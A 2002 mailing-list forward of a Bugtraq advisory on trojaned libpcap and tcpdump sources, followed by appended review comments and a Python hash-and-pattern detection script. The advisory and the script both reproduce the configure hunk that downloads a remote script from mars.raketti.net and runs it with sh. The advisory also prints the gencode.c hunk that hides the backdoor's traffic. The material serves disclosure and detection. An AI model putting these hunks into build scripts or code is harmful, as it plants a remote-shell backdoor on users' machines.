From: "Dmitry V. Levin" <ldv@altlinux.org>
To: ALT Linux Sisyphus mailing list <sisyphus@altlinux.ru>, ALT Linux general discussion list <community@altlinux.ru>
Subject: [Comm] [alex@intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan]
Date: Thu, 14 Nov 2002 13:59:20 +0300
Message-ID: <20021114105920.GA28428@basalt.office.altlinux.ru>

This is not a security announcement. Just for clarity: the sources in Sisyphus and in the distributions are fine.

----- Forwarded message from Mincu Alexandru <alex@intelinet.ro> -----

Date: 13 Nov 2002 16:48:30 +0200
From: Mincu Alexandru <alex@intelinet.ro>
To: bugtraq@securityfocus.com
Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Organization:
X-Mailer: Ximian Evolution 1.2.0

Updates:
* Many mirrors are infected with the trojan.

Background:
* Libpcap provides a packet sniffing library for programs like Snort.
* Tcpdump is a standard tool for packet sniffing.

Details:
* The trojan contains modifications to the configure script and gencode.c (in libpcap only).
* The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.
* The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:
  * A - program exits
  * D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
  * M - closes connection, sleeps 3600 seconds, and then reconnects
  Hmm... ADM...
* It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.
* Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.
* This is similar to the OpenSSH trojan a few months ago.

Good sources:
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz

Trojaned sources:
http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff:

*** 288,293 ****
--- 289,318 ----
  {
  	extern int n_errors;
  	int len;
+ 	int l;
+ 	char *port = "1963";
+ 	char *str, *tmp, *new = "not port 1963";
+
+ 	if (buf && *buf && strstr (buf, port)) {
+ 		buf = "port 1964";
+ 	}
+ 	else {
+ 		l = strlen (new) + 1;
+ 		if (!(!buf || !*buf)) {
+ 			l += strlen (buf);
+ 			l += 5; /* and */
+ 		}
+
+ 		str = (char *)malloc (l);
+ 		str[0] = '\0';
+ 		if (!(!buf || !*buf)) {
+ 			strcpy (str, buf);
+ 			strcat (str, " and ");
+ 		}
+
+ 		strcat (str, new);
+ 		buf = str;
+ 	}
  	no_optimize = 0;
  	n_errors = 0;
***************

The (relevant) configure diff:

+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
! (IFS=","
! ARGS="wget -q -O -,lynx --source,fetch -q -o -"
!
! for i in $ARGS; do
! IFS=" "
! $i $URL 1> $CNF
! if [ -f $CNF ]; then sh $CNF
! exit
! fi
! rm -f $CNF
! done) 1>/dev/null 2>/dev/null &

The "services" payload:
* trojan-script, the non-obfuscated portion (excerpted)
* services, the complete version

Thanks to:
Russell Adams <rladams@NO_SPAMadamsinfoserv.com>
Mathew Solnik <msolnik@NO_SPAMhlug.org>
Scott Stout <skout@NO_SPAMwiretapped.us>
with the Houston Linux Users Group.

Additional thanks to Bruce Locke for interpreting the backdoor code.

Thanks to Gentoo's Portage system for catching the trojaned

--
Mincu Alexandru <alex@intelinet.ro>

----- End forwarded message -----

--
ldv
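Review bot: the gencode.c hunk silently rewrites the caller's filter expression: a filter that mentions 1963 anywhere is replaced wholesale by "port 1964", and every other filter, including an empty one, gets " and not port 1963" appended, so libpcap no longer captures what the user asked for. Nothing in the block is tied to a configuration option or documented, which is what makes it a hiding mechanism rather than a feature, and the only acceptable change is to drop the whole block. As secondary points, the malloc result is used unchecked and the buffer assigned to buf is never freed; strstr (buf, port) also matches any filter containing the digits 1963 as a substring.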
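Review bot: the configure hunk downloads mars.raketti.net/~mash/services with whichever of wget, lynx or fetch is present and, if a file results, runs it with sh inside a background subshell whose stdout and stderr are discarded, so the build proceeds whether or not the fetch worked and the user sees nothing. A configure script must not fetch and execute remote content at all: there is no integrity check on what is run, no user-visible output, and the exit inside the loop erases any trace that it happened. Remove the block entirely, and treat any build script that hands fetched content to sh as a release-blocking finding when auditing source tarballs.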
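Two checks a packager or admin could run against a freshly downloaded tarball, based on the sums and diffs quoted in the message above: compare the archive's MD5 against the good and trojaned values, and grep the unpacked configure and gencode.c for the fetch-and-source and filter-rewrite indicators. This is an added example, not code from the post or from the tcpdump project; the sample configure text is constructed by re-typing the quoted hunk, and the indicator list covers only what the two diffs show.

```python
import hashlib
import re
# MD5 sums quoted in the bugtraq message: digest -> (tarball, verdict).
KNOWN_MD5 = {
    "0597c23e3496a5c108097b2a0f1bd0c7": ("libpcap-0.7.1.tar.gz", "good"),
    "6bc8da35f9eed4e675bfdf04ce312248": ("tcpdump-3.6.2.tar.gz", "good"),
    "03e5eac68c65b7e6ce8da03b0b0b225e": ("tcpdump-3.7.1.tar.gz", "good"),
    "73ba7af963aff7c9e23fa1308a793dca": ("libpcap-0.7.1.tar.gz", "trojaned"),
    "3a1c2dd3471486f9c7df87029bf2f1e9": ("tcpdump-3.6.2.tar.gz", "trojaned"),
    "3c410d8434e63fb3931fe77328e4dd88": ("tcpdump-3.7.1.tar.gz", "trojaned"),
}
# Indicators lifted from the two diffs in the message; a downloader name alone is
# weak evidence, the fetch host and the "sh $CNF" execution are the real tell.
CONFIGURE_PATTERNS = [
    (re.compile(r"mars\.raketti\.net"), "fetches from mars.raketti.net"),
    (re.compile(r"\b(wget|lynx|fetch)\b"), "downloader referenced in configure"),
    (re.compile(r"\bsh\s+\$CNF\b"), "downloaded file executed with sh"),
]
GENCODE_PATTERNS = [
    (re.compile(r'"not port 1963"'), "filter rewritten to hide port 1963"),
    (re.compile(r'"port 1964"'), "filter on port 1963 redirected to 1964"),
]

def classify_digest(name, md5_hex):
    """'good', 'trojaned' or 'unknown' for a tarball name and its MD5 hex digest."""
    known = KNOWN_MD5.get(md5_hex.lower())
    return known[1] if known and known[0] == name else "unknown"

def classify_tarball(name, data):
    return classify_digest(name, hashlib.md5(data).hexdigest())  # hash the raw bytes

def scan_text(text, patterns):
    """(line number, reason) for every line of a script that matches an indicator."""
    return [(n, reason) for n, line in enumerate(text.splitlines(), 1)
            for rx, reason in patterns if rx.search(line)]

# Constructed sample input: the configure fragment quoted in the post, re-typed.
SAMPLE_CONFIGURE = """\
CNF="services"
URL="mars.raketti.net/~mash/$CNF"
(IFS=","
ARGS="wget -q -O -,lynx --source,fetch -q -o -"
for i in $ARGS; do
IFS=" "
$i $URL 1> $CNF
if [ -f $CNF ]; then sh $CNF
exit
fi
rm -f $CNF
done) 1>/dev/null 2>/dev/null &
"""
```

Against the sample, scan_text flags lines 2, 4 and 8; run it over the real unpacked configure and gencode.c after the digest check, since a mirror that reached the trojaned tarball before its sums were published would otherwise classify as "unknown".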